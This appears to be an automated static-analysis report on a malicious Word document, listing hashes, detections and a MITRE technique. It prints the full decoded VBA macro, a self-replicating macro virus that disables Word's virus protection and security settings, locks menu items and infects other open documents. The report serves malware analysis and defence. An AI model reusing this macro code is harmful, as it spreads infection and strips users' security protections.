Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78ad56a4e440fc23…

MALICIOUS

Office (OLE)

637.5 KB Created: 2000-11-22 19:46:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 4cd1e4b64cfb09663f8d2ac02ca79892 SHA-1: 13f25d7bd229ddaa5a26c897b2717f6345b0c5ce SHA-256: 78ad56a4e440fc236f5d374e009bb0331a21e64729e99a99ca453a8dece5bd03
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious OLE file containing VBA macros. The macros attempt to disable Word's security features and manipulate the application's state, indicating preparation for executing a payload. ClamAV detections suggest it is a known trojan.

Heuristics 3

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2165 bytes
SHA-256: 3621afca5eb199f59599480d0740e5f63a15b28bbcd87d73ab5395850902bf48
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Blade"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Document_Close()
On Error Resume Next
'Class.Blade
'code by Necronomikon
'greetz to:Gigabyte,jackie,SnakeByte,Lys Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHammer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR],Fii7e,LISP
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
Options.ConfirmConversions = False
Options.VirusProtection = False
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.SaveNormalPrompt = False
Options.BlueScreen = True: Application.WindowState = wdWindowStateMaximize
CommandBars("Tools").Controls("Macro").Enabled = (99 - 99): CommandBars("File").Controls("Print Preview").Enabled = (99 - 99): CommandBars("Edit").Controls("Select All").Enabled = (99 - 99)
CommandBars("Edit").Controls("Undo VBA-Selection.TypeText").Enabled = (99 - 99):
CommandBars("Tools").Controls("Word Count...").Enabled = (99 - 99):
CommandBars("Tools").Controls("Options...").Enabled = (99 - 99)
For Each Target In Application.VBE.VBProjects
If Target.VBComponents(1).CodeModule.Lines(1, 1) = "" Then Target.VBComponents(1).CodeModule.addfromstring , ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 26)
Next
For i = 1 To Documents.Count
If Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullName
Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\ControlPanel\Desktop", "MenuShowDelay") = "10000"
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1036431352/Ole10Native 564068 bytes
SHA-256: 0086dafff6f2181e94c1e4c822c10849091bfd0778ee9cbd417d72c68a3ae4c2

Open this report in the interactive analyzer, or submit your own file for analysis.